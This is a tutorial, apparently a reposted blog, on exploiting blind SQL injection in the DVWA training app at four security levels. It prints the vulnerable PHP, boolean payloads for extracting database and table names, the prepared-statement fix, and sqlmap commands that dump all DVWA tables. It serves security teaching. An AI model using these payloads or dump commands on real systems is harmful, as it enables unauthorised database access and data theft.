Security ❀ SQL Injection (Blind): blind SQL injection
Posted by 国家级干饭型选手°
Editor's note: this article was compiled by 小常识网 (cha138.com). It walks through the SQL Injection (Blind) module of DVWA at its four security levels and finishes with sqlmap; we hope it is useful as a reference.
1. low
Source code analysis:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
In the blind version the only feedback is whether the user ID exists; nothing from the row itself is echoed. Apart from that the attack is the same as in Chapter 8, SQL Injection.
Blind injection therefore has to establish the length of each name first and then guess it character by character. Doing this by hand against a large database is laborious, so in practice sqlmap does the work; see Section 5.
Blind injection payloads (each one turns the "User ID exists" / "User ID is MISSING" message into a yes/no answer; >, < and = all work, so the compared number can be narrowed down step by step, most efficiently by binary search):
Is the length of the database name greater than 1?
1' and length(database())>1 #
Is the ASCII code of the first character of the database name greater than 1?
1' and ascii(substr(database(),1,1))>1 #
Is the length of the first table name in the current database greater than 1?
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>1 #
Is the ASCII code of the first character of that table name greater than 1?
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1 #
Is the number of columns in the users table equal to 1?
1' and (select count(column_name) from information_schema.columns where table_name='users')=1 #
Is the length of the first column name in the users table equal to 7?
1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))=7 #
Successful check ("User ID exists in the database", screenshot);
Failed check ("User ID is MISSING from the database" with an HTTP 404, screenshot);
2. medium
Source code analysis: same as the SQL Injection source. The input now arrives by POST and is passed through mysqli_real_escape_string, which escapes quotes, backslashes and NUL bytes; it does not filter SQL keywords. Because the query embeds $id without surrounding quotes, the escaping changes nothing: the same conditions work once the leading quote is dropped from the payload and the request is sent as POST.
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
3. high
Source code analysis: same as the SQL Injection source, with three changes. The input is read from the id cookie rather than a form field, LIMIT 1 caps the number of rows returned, and the not-found branch sleeps for 2 to 4 seconds one time in six to confuse time-based blind injection. Boolean-based injection is unaffected: a payload ending in # comments out the LIMIT, and the exists/MISSING message (with its 404) is still the oracle, only now delivered through the cookie.
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
4. impossible
Source code analysis: an anti-CSRF token is checked, the input must pass is_numeric, and it is bound as an integer (PDO::PARAM_INT) into a prepared statement, so the value never becomes part of the SQL text. The 404 on a miss still reveals whether a given ID exists, but that is the page's intended behaviour rather than an injection.
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
5. Blind injection with sqlmap
(sqlmap is available directly in Kali; to run it on Windows see the document "Windows系统下如何使用sqlmap")
Capture the HTTP request with Burp Suite;
Captured request (screenshot);
Copy the raw request into a new text file and name it 1.txt (any name works; a short one is easier to type);
Put 1.txt in the directory that contains the sqlmap script;
Open the sqlmap shortcut on the desktop and run the commands below. -r replays the saved request as captured, so the file must still contain the DVWA session cookie and the security cookie; without them sqlmap is sent to the login page and finds nothing.
Enumerate the databases
C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sqlmap>sqlmap.py -r 1.txt --dbs
Result (screenshot):
Dump every table of the dvwa database
C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sqlmap>sqlmap.py -r 1.txt -D dvwa --dump-all
Result (screenshot):